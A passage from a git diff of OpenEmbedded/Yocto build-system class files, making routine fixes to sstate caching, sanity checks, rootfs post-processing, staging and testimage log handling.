 ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
 
 # Create /etc/timestamp during image construction to give a reasonably sane default time setting
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; "
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
 
 # Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
 ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
 APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
 
 # Generates test data file with data store variables expanded in json format
-ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; "
+ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
 
 # Write manifest
 IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
 
     if os.path.exists(manifest_name) and link_name:
         manifest_link = deploy_dir + "/" + link_name + ".manifest"
-        if os.path.lexists(manifest_link):
-            os.remove(manifest_link)
-        os.symlink(os.path.basename(manifest_name), manifest_link)
+        if manifest_link != manifest_name:
+            if os.path.lexists(manifest_link):
+                os.remove(manifest_link)
+            os.symlink(os.path.basename(manifest_name), manifest_link)
 }
 
 # Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
 }
 
 rootfs_check_host_user_contaminated () {
-	contaminated="${WORKDIR}/host-user-contaminated.txt"
+	contaminated="${S}/host-user-contaminated.txt"
 	HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
 	HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
 
@@ -339,9 +340,10 @@ python write_image_test_data() {
 
     if os.path.exists(testdata_name) and link_name:
         testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
-        if os.path.lexists(testdata_link):
-            os.remove(testdata_link)
-        os.symlink(os.path.basename(testdata_name), testdata_link)
+        if testdata_link != testdata_name:
+            if os.path.lexists(testdata_link):
+                os.remove(testdata_link)
+            os.symlink(os.path.basename(testdata_name), testdata_link)
 }
 write_image_test_data[vardepsexclude] += "TOPDIR"
 
diff --git a/meta/classes/rootfs_deb.bbclass b/meta/classes/rootfs_deb.bbclass
index 2b93796a76..ef616da229 100644
--- a/meta/classes/rootfs_deb.bbclass
+++ b/meta/classes/rootfs_deb.bbclass
@@ -7,7 +7,7 @@ ROOTFS_PKGMANAGE = "dpkg apt"
 do_rootfs[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot"
 do_populate_sdk[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot bzip2-native:do_populate_sysroot"
 do_rootfs[recrdeptask] += "do_package_write_deb do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
 
 do_rootfs[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
 do_populate_sdk[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
diff --git a/meta/classes/rootfs_ipk.bbclass b/meta/classes/rootfs_ipk.bbclass
index e73d2bfdae..f1e0219732 100644
--- a/meta/classes/rootfs_ipk.bbclass
+++ b/meta/classes/rootfs_ipk.bbclass
@@ -11,7 +11,7 @@ ROOTFS_PKGMANAGE = "opkg ${EXTRAOPKGCONFIG}"
 do_rootfs[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
 do_populate_sdk[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
 do_rootfs[recrdeptask] += "do_package_write_ipk do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
 
 do_rootfs[lockfiles] += "${WORKDIR}/ipk.lock"
 do_populate_sdk[lockfiles] += "${WORKDIR}/ipk.lock"
diff --git a/meta/classes/rootfs_rpm.bbclass b/meta/classes/rootfs_rpm.bbclass
index 51f89ea990..ae0f541c49 100644
--- a/meta/classes/rootfs_rpm.bbclass
+++ b/meta/classes/rootfs_rpm.bbclass
@@ -24,7 +24,7 @@ do_rootfs[depends] += "${RPMROOTFSDEPENDS}"
 do_populate_sdk[depends] += "${RPMROOTFSDEPENDS}"
 
 do_rootfs[recrdeptask] += "do_package_write_rpm do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
 
 python () {
     if d.getVar('BUILD_IMAGES_FROM_FEEDS'):
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
 ROOTFS_DEBUG_FILES ?= ""
 ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
 
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;"
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
 rootfs_debug_files () {
    #!/bin/sh -e
    echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 1486cce357..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
             msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
             if len(msg) == 0:
                 msg = "%s.\n" % err
-                msg += "    Please ensure your host's network is configured correctly,\n"
-                msg += "    or set BB_NO_NETWORK = \"1\" to disable network access if\n"
-                msg += "    all required sources are on local disk.\n"
+                msg += "    Please ensure your host's network is configured correctly.\n"
+                msg += "    If your ISP or network is blocking the above URL,\n"
+                msg += "    try with another domain name, for example by setting:\n"
+                msg += "    CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
+                msg += "    You could also set BB_NO_NETWORK = \"1\" to disable network\n"
+                msg += "    access if all required sources are on local disk.\n"
             retval = msg
 
     return retval
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
     version = result.split()[3]
     if LooseVersion(version) < LooseVersion("1.28"):
         return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
+
+    try:
+        result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
+        if "--xattrs" not in result:
+            return "Your tar doesn't support --xattrs, please use GNU tar.\n"
+    except subprocess.CalledProcessError as e:
+        return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
+
     return None
 
 # We use git parameters and functionality only found in 1.7.8 or later
@@ -619,6 +630,9 @@ def sanity_handle_abichanges(status, d):
                 f.write(current_abi)
         elif int(abi) <= 11 and current_abi == "12":
             status.addresult("The layout of TMPDIR changed for Recipe Specific Sysroots.\nConversion doesn't make sense and this change will rebuild everything so please delete TMPDIR (%s).\n" % d.getVar("TMPDIR"))
+        elif int(abi) <= 13 and current_abi == "14":
+            status.addresult("TMPDIR changed to include path filtering from the pseudo database.\nIt is recommended to use a clean TMPDIR with the new pseudo path filtering so TMPDIR (%s) would need to be removed to continue.\n" % d.getVar("TMPDIR"))
+
         elif (abi != current_abi):
             # Code to convert from one ABI to another could go here if possible.
             status.addresult("Error, TMPDIR has changed its layout version number (%s to %s) and you need to either rebuild, revert or adjust it at your own risk.\n" % (abi, current_abi))
@@ -700,6 +714,23 @@ def check_sanity_version_change(status, d):
     if (tmpdirmode & stat.S_ISUID):
         status.addresult("TMPDIR is setuid, please don't build in a setuid directory")
 
+    # Check that a user isn't building in a path in PSEUDO_IGNORE_PATHS
+    pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+    workdir = d.getVar('WORKDIR', expand=True)
+    for i in pseudoignorepaths:
+        if i and workdir.startswith(i):
+            status.addresult("You are building in a path included in PSEUDO_IGNORE_PATHS " + str(i) + " please locate the build outside this path.\n")
+
+    # Check if PSEUDO_IGNORE_PATHS and and paths under pseudo control overlap
+    pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+    pseudo_control_dir = "${D},${PKGD},${PKGDEST},${IMAGEROOTFS},${SDK_OUTPUT}"
+    pseudocontroldir = d.expand(pseudo_control_dir).split(",")
+    for i in pseudoignorepaths:
+        for j in pseudocontroldir:
+            if i and j:
+                if j.startswith(i):
+                    status.addresult("A path included in PSEUDO_IGNORE_PATHS " + str(i) + " and the path " + str(j) + " overlap and this will break pseudo permission and ownership tracking. Please set the path " + str(j) + " to a different directory which does not overlap with pseudo controlled directories. \n")
+
     # Some third-party software apparently relies on chmod etc. being suid root (!!)
     import stat
     suid_check_bins = "chown chmod mknod".split()
@@ -784,6 +815,11 @@ def check_sanity_everybuild(status, d):
     if "." in paths or "./" in paths or "" in paths:
         status.addresult("PATH contains '.', './' or '' (empty element), which will break the build, please remove this.\nParsed PATH is " + str(paths) + "\n")
 
+    #Check if bitbake is present in PATH environment variable
+    bb_check = bb.utils.which(d.getVar('PATH'), 'bitbake')
+    if not bb_check:
+        bb.warn("bitbake binary is not found in PATH, did you source the script?")
+
     # Check whether 'inherit' directive is found (used for a class to inherit)
     # in conf file it's supposed to be uppercase INHERIT
     inherit = d.getVar('inherit')
@@ -857,13 +893,18 @@ def check_sanity_everybuild(status, d):
         except:
             pass
 
-    oeroot = d.getVar('COREBASE')
-    if oeroot.find('+') != -1:
-        status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.")
-    if oeroot.find('@') != -1:
-        status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.")
-    if oeroot.find(' ') != -1:
-        status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.")
+    for checkdir in ['COREBASE', 'TMPDIR']:
+        val = d.getVar(checkdir)
+        if val.find('..') != -1:
+            status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
+        if val.find('+') != -1:
+            status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
+        if val.find('@') != -1:
+            status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
+        if val.find(' ') != -1:
+            status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
+        if val.find('%') != -1:
+            status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
 
     # Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
     import re
diff --git a/meta/classes/scons.bbclass b/meta/classes/scons.bbclass
index 6b171ca8df..4f3ae502ef 100644
--- a/meta/classes/scons.bbclass
+++ b/meta/classes/scons.bbclass
@@ -5,7 +5,6 @@ DEPENDS += "python3-scons-native"
 EXTRA_OESCONS ?= ""
 
 do_configure() {
-	unset _PYTHON_SYSCONFIGDATA_NAME
 	if [ -n "${CONFIGURESTAMPFILE}" ]; then
 		if [ -e "${CONFIGURESTAMPFILE}" -a "`cat ${CONFIGURESTAMPFILE}`" != "${BB_TASKHASH}" -a "${CLEANBROKEN}" != "1" ]; then
 			${STAGING_BINDIR_NATIVE}/scons --clean PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS}
@@ -17,13 +16,11 @@ do_configure() {
 }
 
 scons_do_compile() {
-	unset _PYTHON_SYSCONFIGDATA_NAME
 	${STAGING_BINDIR_NATIVE}/scons ${PARALLEL_MAKE} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} || \
 	die "scons build execution failed."
 }
 
 scons_do_install() {
-	unset _PYTHON_SYSCONFIGDATA_NAME
 	${STAGING_BINDIR_NATIVE}/scons install_root=${D}${prefix} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} install || \
 	die "scons install execution failed."
 }
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index 66a96a7603..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
         components = spec.split(":")
         # Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
         # 7 is for the separators
-        avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
+        avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
         components[2] = components[2][:avail]
         components[3] = components[3][:avail]
         components[4] = components[4][:avail]
@@ -72,6 +72,7 @@ BB_HASHFILENAME = "False ${SSTATE_PKGSPEC} ${SSTATE_SWSPEC}"
 
 SSTATE_ARCHS = " \
     ${BUILD_ARCH} \
+    ${BUILD_ARCH}_${ORIGNATIVELSBSTRING} \
     ${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS} \
     ${BUILD_ARCH}_${TARGET_ARCH} \
     ${SDK_ARCH}_${SDK_OS} \
@@ -80,6 +81,7 @@ SSTATE_ARCHS = " \
     ${PACKAGE_ARCH} \
     ${PACKAGE_EXTRA_ARCHS} \
     ${MACHINE_ARCH}"
+SSTATE_ARCHS[vardepsexclude] = "ORIGNATIVELSBSTRING"
 
 SSTATE_MANMACH ?= "${SSTATE_PKGARCH}"
 
@@ -315,6 +317,8 @@ def sstate_install(ss, d):
     if os.path.exists(i):
         with open(i, "r") as f:
             manifests = f.readlines()
+    # We append new entries, we don't remove older entries which may have the same
+    # manifest name but different versions from stamp/workdir. See below.
     if filedata not in manifests:
         with open(i, "a+") as f:
             f.write(filedata)
@@ -477,7 +481,7 @@ def sstate_clean_cachefiles(d):
         ss = sstate_state_fromvars(ld, task)
         sstate_clean_cachefile(ss, ld)
 
-def sstate_clean_manifest(manifest, d, prefix=None):
+def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
     import oe.path
 
     mfile = open(manifest)
@@ -495,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
             if entry.endswith("/"):
                 if os.path.islink(entry[:-1]):
                     os.remove(entry[:-1])
-                elif os.path.exists(entry) and len(os.listdir(entry)) == 0:
+                elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
+                    # Removing directories whilst builds are in progress exposes a race. Only
+                    # do it in contexts where it is safe to do so.
                     os.rmdir(entry[:-1])
             else:
                 os.remove(entry)
@@ -533,7 +539,7 @@ def sstate_clean(ss, d):
         for lock in ss['lockfiles']:
             locks.append(bb.utils.lockfile(lock))
 
-        sstate_clean_manifest(manifest, d)
+        sstate_clean_manifest(manifest, d, canrace=True)
 
         for lock in locks:
             bb.utils.unlockfile(lock)
@@ -634,10 +640,21 @@ python sstate_hardcode_path () {
 
 def sstate_package(ss, d):
     import oe.path
+    import time
 
     tmpdir = d.getVar('TMPDIR')
 
+    fixtime = False
+    if ss['task'] == "package":
+        fixtime = True
+
+    def fixtimestamp(root, path):
+        f = os.path.join(root, path)
+        if os.lstat(f).st_mtime > sde:
+            os.utime(f, (sde, sde), follow_symlinks=False)
+
     sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
+    sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
     d.setVar("SSTATE_CURRTASK", ss['task'])
     bb.utils.remove(sstatebuild, recurse=True)
     bb.utils.mkdirhier(sstatebuild)
@@ -650,6 +667,8 @@ def sstate_package(ss, d):
         # to sstate tasks but there aren't many of these so better just avoid them entirely.
         for walkroot, dirs, files in os.walk(state[1]):
             for file in files + dirs:
+                if fixtime:
+                    fixtimestamp(walkroot, file)
                 srcpath = os.path.join(walkroot, file)
                 if not os.path.islink(srcpath):
                     continue
@@ -671,6 +690,11 @@ def sstate_package(ss, d):
         bb.utils.mkdirhier(plain)
         bb.utils.mkdirhier(pdir)
         os.rename(plain, pdir)
+        if fixtime:
+            fixtimestamp(pdir, "")
+            for walkroot, dirs, files in os.walk(pdir):
+                for file in files + dirs:
+                    fixtimestamp(walkroot, file)
 
     d.setVar('SSTATE_BUILDDIR', sstatebuild)
     d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -697,9 +721,16 @@ def sstate_package(ss, d):
             os.utime(siginfo, None)
         except PermissionError:
             pass
+        except OSError as e:
+            # Handle read-only file systems gracefully
+            import errno
+            if e.errno != errno.EROFS:
+                raise e
 
     return
 
+sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
+
 def pstaging_fetch(sstatefetch, d):
     import bb.fetch2
 
@@ -783,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
 sstate_create_package () {
 	# Exit early if it already exists
 	if [ -e ${SSTATE_PKG} ]; then
-		[ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+		touch ${SSTATE_PKG} 2>/dev/null || true
 		return
 	fi
 
@@ -810,14 +841,18 @@ sstate_create_package () {
 	fi
 	chmod 0664 $TFILE
 	# Skip if it was already created by some other process
-	if [ ! -e ${SSTATE_PKG} ]; then
+	if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
+		# There is a symbolic link, but it links to nothing.
+		# Forcefully replace it with the new file.
+		ln -f $TFILE ${SSTATE_PKG} || true
+	elif [ ! -e ${SSTATE_PKG} ]; then
 		# Move into place using ln to attempt an atomic op.
 		# Abort if it already exists
-		ln $TFILE ${SSTATE_PKG} && rm $TFILE
+		ln $TFILE ${SSTATE_PKG} || true
 	else
-		rm $TFILE
+		touch ${SSTATE_PKG} 2>/dev/null || true
 	fi
-	[ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+	rm $TFILE
 }
 
 python sstate_sign_package () {
@@ -846,12 +881,12 @@ python sstate_report_unihash() {
 #
 sstate_unpack_package () {
 	tar -xvzf ${SSTATE_PKG}
-	# update .siginfo atime on local/NFS mirror
-	[ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo
-	# Use "! -w ||" to return true for read only files
-	[ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG}
-	[ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig
-	[ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo
+	# update .siginfo atime on local/NFS mirror if it is a symbolic link
+	[ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
+	# update each symbolic link instead of any referenced file
+	touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
+	[ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
+	[ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
 }
 
 BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -926,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
 
             localdata2 = bb.data.createCopy(localdata)
             srcuri = "file://" + sstatefile
-            localdata.setVar('SRC_URI', srcuri)
+            localdata2.setVar('SRC_URI', srcuri)
             bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
 
             try:
@@ -937,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
                 found.add(tid)
                 if tid in missed:
                     missed.remove(tid)
-            except:
+            except bb.fetch2.FetchError as e:
                 missed.add(tid)
-                bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri)
-                pass
+                bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
+            except Exception as e:
+                bb.error("SState: cannot test %s: %s" % (srcuri, e))
             if len(tasklist) >= min_tasks:
                 bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
 
@@ -1002,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
         bb.parse.siggen.checkhashes(sq_data, missed, found, d)
 
     return found
+setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
 
 BB_SETSCENE_DEPVALID = "setscene_depvalid"
 
@@ -1027,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
     if taskdependees[task][1] == "do_populate_lic":
         return True
 
+    # We only need to trigger deploy_source_date_epoch through direct dependencies
+    if taskdependees[task][1] == "do_deploy_source_date_epoch":
+        return True
+
     # stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
     if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
         return True
@@ -1133,6 +1174,11 @@ python sstate_eventhandler() {
                 os.utime(siginfo, None)
             except PermissionError:
                 pass
+            except OSError as e:
+                # Handle read-only file systems gracefully
+                import errno
+                if e.errno != errno.EROFS:
+                    raise e
 
 }
 
@@ -1171,11 +1217,21 @@ python sstate_eventhandler2() {
         i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
         if not os.path.exists(i):
             continue
+        manseen = set()
+        ignore = []
         with open(i, "r") as f:
             lines = f.readlines()
-            for l in lines:
+            for l in reversed(lines):
                 try:
                     (stamp, manifest, workdir) = l.split()
+                    # The index may have multiple entries for the same manifest as the code above only appends
+                    # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
+                    # The last entry in the list is the valid one, any earlier entries with matching manifests
+                    # should be ignored.
+                    if manifest in manseen:
+                        ignore.append(l)
+                        continue
+                    manseen.add(manifest)
                     if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
                         toremove.append(l)
                         if stamp not in seen:
@@ -1206,6 +1262,8 @@ python sstate_eventhandler2() {
 
         with open(i, "w") as f:
             for l in lines:
+                if l in ignore:
+                    continue
                 f.write(l)
     machineindex |= set(stamps)
     with open(mi, "w") as f:
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 5b04f88b2d..21523c8f75 100644
--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -27,11 +27,15 @@ SYSROOT_DIRS_BLACKLIST = " \
     ${mandir} \
     ${docdir} \
     ${infodir} \
+    ${datadir}/X11/locale \
     ${datadir}/applications \
+    ${datadir}/bash-completion \
     ${datadir}/fonts \
     ${datadir}/gtk-doc/html \
+    ${datadir}/installed-tests \
     ${datadir}/locale \
     ${datadir}/pixmaps \
+    ${datadir}/terminfo \
     ${libdir}/${BPN}/ptest \
 "
 
@@ -263,6 +267,10 @@ python extend_recipe_sysroot() {
     pn = d.getVar("PN")
     stagingdir = d.getVar("STAGING_DIR")
     sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
+    # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
+    manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
+    if manifestprefix:
+        sharedmanifests = sharedmanifests + "/" + manifestprefix
     recipesysroot = d.getVar("RECIPE_SYSROOT")
     recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
 
@@ -404,7 +412,7 @@ python extend_recipe_sysroot() {
         if os.path.islink(f) and not os.path.exists(f):
             bb.note("%s no longer exists, removing from sysroot" % f)
             lnk = os.readlink(f.replace(".complete", ""))
-            sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+            sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
             os.unlink(f)
             os.unlink(f.replace(".complete", ""))
 
@@ -449,7 +457,7 @@ python extend_recipe_sysroot() {
             fl = depdir + "/" + l
             bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
             lnk = os.readlink(fl)
-            sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+            sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
             os.unlink(fl)
             os.unlink(fl + ".complete")
 
@@ -470,7 +478,7 @@ python extend_recipe_sysroot() {
                 continue
             else:
                 bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
-                sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+                sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
                 os.unlink(depdir + "/" + c)
                 if os.path.lexists(depdir + "/" + c + ".complete"):
                     os.unlink(depdir + "/" + c + ".complete")
diff --git a/meta/classes/systemd.bbclass b/meta/classes/systemd.bbclass
index 9e8a82c9f1..a4bff732b9 100644
--- a/meta/classes/systemd.bbclass
+++ b/meta/classes/systemd.bbclass
@@ -174,7 +174,8 @@ python systemd_populate_packages() {
                 if path_found != '':
                     systemd_add_files_and_parse(pkg_systemd, path_found, service, keys)
                 else:
-                    bb.fatal("SYSTEMD_SERVICE_%s value %s does not exist" % (pkg_systemd, service))
+                    bb.fatal("Didn't find service unit '{0}', specified in SYSTEMD_SERVICE_{1}. {2}".format(
+                        service, pkg_systemd, "Also looked for service unit '{0}'.".format(base) if base is not None else ""))
 
     def systemd_create_presets(pkg, action):
         presetf = oe.path.join(d.getVar("PKGD"), d.getVar("systemd_unitdir"), "system-preset/98-%s.preset" % pkg)
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
 TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
 
 testimage_dump_target () {
-    top -bn1
-    ps
-    free
-    df
-    # The next command will export the default gateway IP
-    export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
-    ping -c3 $DEFAULT_GATEWAY
-    dmesg
-    netstat -an
-    ip address
-    # Next command will dump logs from /var/log/
-    find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
 }
 
 testimage_dump_host () {
-    top -bn1
-    iostat -x -z -N -d -p ALL 20 2
-    ps -ef
-    free
-    df
-    memstat
-    dmesg
-    ip -s link
-    netstat -an
 }
 
 python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
     import json
     import signal
     import logging
+    import shutil
 
     from bb.utils import export_proxies
     from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
 
     tdname = "%s.testdata.json" % image_name
     try:
-        td = json.load(open(tdname, "r"))
-    except (FileNotFoundError) as err:
-         bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname)
+        with open(tdname, "r") as f:
+            td = json.load(f)
+    except FileNotFoundError as err:
+        bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
 
     # Some variables need to be updates (mostly paths) with the
     # ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
                         get_testimage_result_id(configuration),
                         dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
         results.logSummary(pn)
+
+    # Copy additional logs to tmp/log/oeqa so it's easier to find them
+    targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
+    os.makedirs(targetdir, exist_ok=True)
+    os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
+    os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
+
     if not results or not complete:
-        bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True)
+        bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
     if not results.wasSuccessful():
-        bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True)
+        bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
 
 def get_runtime_paths(d):
     """
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
 	echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
 	echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
